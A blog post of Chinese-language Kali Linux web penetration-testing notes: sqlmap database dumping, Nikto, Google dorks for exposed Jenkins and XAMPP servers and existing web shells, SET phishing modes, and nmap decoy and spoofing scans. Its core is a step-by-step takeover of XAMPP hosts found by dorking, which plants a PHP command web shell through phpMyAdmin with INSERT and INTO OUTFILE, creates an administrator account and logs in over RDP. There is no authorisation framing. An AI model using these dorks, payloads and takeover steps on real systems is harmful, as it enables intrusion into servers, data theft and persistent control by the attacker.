kali linux web渗透测试学习笔记

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介:    kali linux web渗透测试学习笔记 metasploit使用方法: 启动: 第一步:启用Postgresql服务。

   

kali linux web渗透测试学习笔记

metasploit使用方法:

启动:

第一步:启用Postgresql服务。service postgresql start

第二步:启用metasploit服务。service matasploit start

第三步:启动框架。msfconsole

一个ASP站点的sql注入

测试数字型注入点

1.网址:aspID+13,后面加',看看是什么数据库,然后输入1=1,1=2,得到数据库是microsoft acess

2.转用sqlmap工具测试,命令:sqlmap -u 目标网址 --dbs --current-user

sqlmap拆解数据库和表名

拆解表名

命令:sqlmap -u 目标网址 --tables,线程数最大为10,基于字典拆解表名,得到的表可能不全面。

dump表数据

1.拆解一个表的列名

命令:sqlmap -u 目标网址 -T 表名 --columns

2.得到感兴趣的字段的值

命令:sqlmap -u 目标网址 -T 表名 -C 列名1,列名2,列名3 --dump

登录后台

找到登录按钮

教训:数据库密码一定要加密!

一个PHP站点的sql注入

测试数字型注入点

index.php?id=1,同上,得到数据库为mysql

sqlmap拆解数据库和表名

1.扫描数据库

命令:sqlmap -u 目标网址 --dbs --current-user

2.扫描某个数据库的表

命令:sqlmap -u 目标网址 --dbms mysql-D 数据库名 --tables,参数可自行选择

dump表数据

查看表字段

同上

利用nikto帮助寻找隐藏目录,利用网页源代码中的隐藏信息寻找管理后台

命令:nikto -host 目标网站

将找到的路径放进去查看,一个个试试,附加上查看源代码,找manage

提升管理员权限:

fiddler看看页面情况,查看系统返回的代码,编辑建立HTML文件,运行,设置fiddlerauto),将返回结果保存在本地。

返回页面

Google hack实战

能做到的事:

1.寻找持续构建工具Jenkins管理面板,有可能获取某些项目的源代码或者敏感信息;

2.综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西

3.后门查找

4.关于Google hack database

Google hack语法查询:http://www.xuanhun521.com

寻找持续构建工具Jenkins(一个源代码构建工具,可以查看开发人员,项目,源代码)管理面板

1.inurl:8080 intitle:"Dashboard [Jenkins]"     造成源代码泄露

综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西

寻找安装xampp的主机:inurl:"xampp/index"  intext:"XAMPP for Windows"

1)寻找phpmyadmin不用验证或者弱口令管理页面,通过mysqlroot权限插入一句话木马提取,获取服务器管理权限

1>>有用信息:phpinfo。可以看到网站目录;phpmyadmin管理入口,看权限菜单,添加用户

2>>连接网站的mysql服务器

          命令:mysql -u 你添加的用户名 -h 你找的网站ip -p 你添加的账户密码

         use mysql

3>>创建表

4>>向表中插入数据,其实插入的是一段命令,调用cmd并且在系统环境下执行

命令:INSERT INTO aa (packet) VALUES('<pre><body bgcolor=silver><? @sysytem($_GET["cmd"]); ?></body></pre>')

5>>select * into outfile ' / / / /aa.php ' from aa,这里的路径应该是可执行的。可以将路径粘贴下来,写如phpinfo的路径

6>>访问这个网站地址。........../aa.php

7>>好了,接下来我们前面插入的那句话就要起作用啦。试着访问........../aa.php?cmd=dir,这里可以写好多命令哦

8>>接下来创建账号cmd=net user 小明 123456 /add  ,创建成功!

9>>将我们创建的账户添加到管理员用户组cmd=net localgroup administrators 小明 /add

10>>启动mstsc,远程连接,用户名和密码就是我们刚刚创建的小明和123456

后门查找

Google搜索目标:intitle:"=[1n73ct10n privat shell]="

intitle:"WSO 2.4"[Sec.Info],[Files],[Console],[Sql],[Php],[Safe mode],[String tools],[Bruteforce],[Network],[Self remove]

关于google hack database

http://www.exploit-db.com/google-dorks/

SET,社会工程学工具集

SET是开源的社会工程学利用套件,通常结合metasploit来使用,项目地址:http://github.com/trustedsec/social-engineer-toolkit

进入kali,用命令setoolkit启动,选1。攻击方法:

鱼叉式钓鱼攻击(通过邮件,发送有问题邮件),网站攻击,介质感染攻击,群发邮件攻击,基于Arduino的攻击,短信欺骗攻击,无线接入点攻击,二维码攻击,powershell攻击

 

nmap

主机扫描:

namp -sL 103.10.87.1-255 列表扫描

nmap -PE  IP

nmap -Pn IP(不适用ping扫描,更适用于Internet)

nmap -sP IP(快速ping扫描),用来快速发现存活主机

-sn参数,只探测存活主机,不管端口啥的

尝试多种扫描方式,来扫描主机

端口扫描:

nmap -sS IP

nmap -sT IP ;TCP端口扫描

nmap -sU IP; UDP端口扫描

nmap -sU -p 80,445 IP ;指定端口

nmap -sT -v IP启用细节模式

操作系统探测:

参数:

-O(启用操作系统检测)

-osscan-limit(针对指定的目标进行操作系统检测)

--osscan-guess;--fuzzy(推测OS检测结果,在nmap不能给出确定结果的情况下使用)

示例:

nmap -sT -O IP

nmap -sT -p 3390 -O --osscan-limit IP  (只有打开3390端口,才进行操作系统版本探测)

namp -sA -O IP

服务程序探测:

nmap -sA -sV IP  扫描方式ACK ;扫描某台主机的服务程序

nmap -sV -p 22,53,110           ;扫描某个服务的服务程序

nmap高级用法:

nmap --iflist(查看本地路由与接口) 可以看到网关地址,网络接口啥的

nmap -e 08:00:27:47:63:E6 IP(指定macIP地址)(本地有多个网络接口时

nmap -T4 -F -n -Pn -D192.168.1.100,192.168.1.101,192.168.1.102,ME 192.168.1.103(地址诱骗)前面地址都是虚假的,后面的才是真的

nmap -sV --spoof -mac 08:00:27:47:63:E6 IP(虚假mac地址)

nmap -sV --source-port 900 IP --source-port(指定源端口)

nmap -p1-25,80,512,2001,4001,6001,9001 10.20.0.1/16(扫描思科路由器)

nmap -sU -p69 -nvv 192.168.1.253(扫描路由器的tftp协议)

nmap -O -F -n 103.10.87.148(-F快速扫描扫描常见的端口

nmap --script=brute 103.10.87.148(暴力破解)

参考资料:http://drops.wooyun.org/tips/2188

zmap

专注于网络端口的扫描

官方站点:http://zmap.io/

源码:https://github.com/zmap/zmap

zmap安装及使用:链接:http://pan.baidu.com/s/1bp7ddhl 密码:ypbr   pan 百度云盘)

默认情况使用SYN扫描方式

相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
1月前
|
安全 测试技术 网络安全
如何在Python Web开发中进行安全测试?
如何在Python Web开发中进行安全测试?
|
1月前
|
安全 关系型数据库 测试技术
学习Python Web开发的安全测试需要具备哪些知识?
学习Python Web开发的安全测试需要具备哪些知识?
33 4
|
11天前
|
Web App开发 IDE JavaScript
Selenium IDE:Web自动化测试的得力助手
Selenium IDE:Web自动化测试的利器。作为开源工具,Selenium IDE支持录制与回放用户操作,适用于Chrome、Firefox等多浏览器,简化了测试流程,提升了效率,降低了自动化测试的门槛。它还支持导出多种编程语言的脚本,便于测试集成与复用。
61 19
Selenium IDE:Web自动化测试的得力助手
|
13天前
|
Web App开发 IDE 测试技术
Selenium:强大的 Web 自动化测试工具
Selenium 是一款强大的 Web 自动化测试工具,包括 Selenium IDE、WebDriver 和 Grid 三大组件,支持多种编程语言和跨平台操作。它能有效提高测试效率,解决跨浏览器兼容性问题,进行性能测试和数据驱动测试,尽管存在学习曲线较陡、不稳定等缺点,但其优势明显,是自动化测试领域的首选工具。
94 17
Selenium:强大的 Web 自动化测试工具
|
8天前
|
Linux Shell 网络安全
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
本指南介绍如何利用 HTA 文件和 Metasploit 框架进行渗透测试。通过创建反向 shell、生成 HTA 文件、设置 HTTP 服务器和发送文件,最终实现对目标系统的控制。适用于教育目的,需合法授权。
39 9
Kali Linux系统Metasploit框架利用 HTA 文件进行渗透测试实验
|
14天前
|
安全 Ubuntu Linux
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
38 9
Metasploit Pro 4.22.6-2024111901 (Linux, Windows) - 专业渗透测试框架
|
5天前
|
网络协议 Linux 应用服务中间件
kali的常用命令汇总Linux
kali的常用命令汇总linux
26 7
|
1月前
|
监控 安全 测试技术
如何在实际项目中应用Python Web开发的安全测试知识?
如何在实际项目中应用Python Web开发的安全测试知识?
29 4
|
1月前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
1月前
|
Web App开发 测试技术 数据安全/隐私保护
自动化测试的魔法:使用Python进行Web应用测试
【10月更文挑战第32天】本文将带你走进自动化测试的世界,通过Python和Selenium库的力量,展示如何轻松对Web应用进行自动化测试。我们将一起探索编写简单而强大的测试脚本的秘诀,并理解如何利用这些脚本来确保我们的软件质量。无论你是测试新手还是希望提升自动化测试技能的开发者,这篇文章都将为你打开一扇门,让你看到自动化测试不仅可行,而且充满乐趣。
下一篇
DataWorks